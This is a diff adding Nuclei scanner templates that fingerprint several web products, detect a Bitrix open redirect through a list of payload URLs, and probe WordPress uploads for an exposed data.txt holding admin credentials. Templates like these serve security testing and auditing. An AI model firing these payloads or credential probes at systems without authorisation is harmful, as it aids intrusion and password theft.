technologies/operations-automation-default-page.yaml Normal file
View File

@ -0,0 +1,23 @@
id: operations-automation-default-page
info:
name: Operations Automation Default Page
author: dhiyaneshDK
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
tags: tech,default
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Operations Automation Default Page</title>'
- type: status
status:
- 200

25
technologies/phpcollab-detect.yaml Normal file
View File

@ -0,0 +1,25 @@
id: phpcollab-detect
info:
name: PhpCollab detect
author: pikpikcu
severity: info
tags: tech,phpcollab
requests:
- method: GET
path:
- "{{BaseURL}}/general/login.php"
matchers:
- type: word
part: body
words:
- '<title>PhpCollab</title>'
extractors:
- type: regex
part: body
group: 1
regex:
- '<p id="footer">(.*)</p>'

25
technologies/wondercms-detect.yaml Normal file
View File

@ -0,0 +1,25 @@
id: wondercms-detect
info:
name: WonderCMS Detect
author: pikpikcu
severity: info
tags: tech,wondercms
requests:
- method: GET
path:
- "{{BaseURL}}/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Powered by WonderCMS"
- "https://www.wondercms.com"
condition: and
- type: status
status:
- 200

2
vulnerabilities/jenkins/jenkins-stack-trace.yaml
View File

@ -1,4 +1,4 @@
id: jenkins-stack-traces
id: jenkins-stack-trace
info:
name: Detect Jenkins in Debug Mode with Stack Traces Enabled

0
vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml → vulnerabilities/jenkins/unaunthenticated-jenkin.yaml
View File

38
vulnerabilities/other/bitrix-open-redirect.yaml Normal file
View File

@ -0,0 +1,38 @@
id: bitrix-open-redirect
info:
name: Bitrix Open URL redirect detection
author: pikpikcu
severity: low
reference: https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html
tags: redirect,bitrix
requests:
- method: GET
path:
- '{{BaseURL}}/bitrix/rk.php?goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com'
- '{{BaseURL}}bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
matchers-condition: and
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header
- type: status
status:
- 302
- 301
condition: or

29
vulnerabilities/wordpress/wp-upload-data.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wordpress-upload-data
info:
name: wordpress-upload-data
author: pussycat0x
severity: medium
description: Searches for Passwords in the wordpress uploads directory.
reference: https://www.exploit-db.com/ghdb/7040
tags: wordpress,listing
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/data.txt"
matchers-condition: and
matchers:
- type: word
words:
- "admin:"
- type: word
part: header
words:
- "text/plain"
- type: status
status:
- 200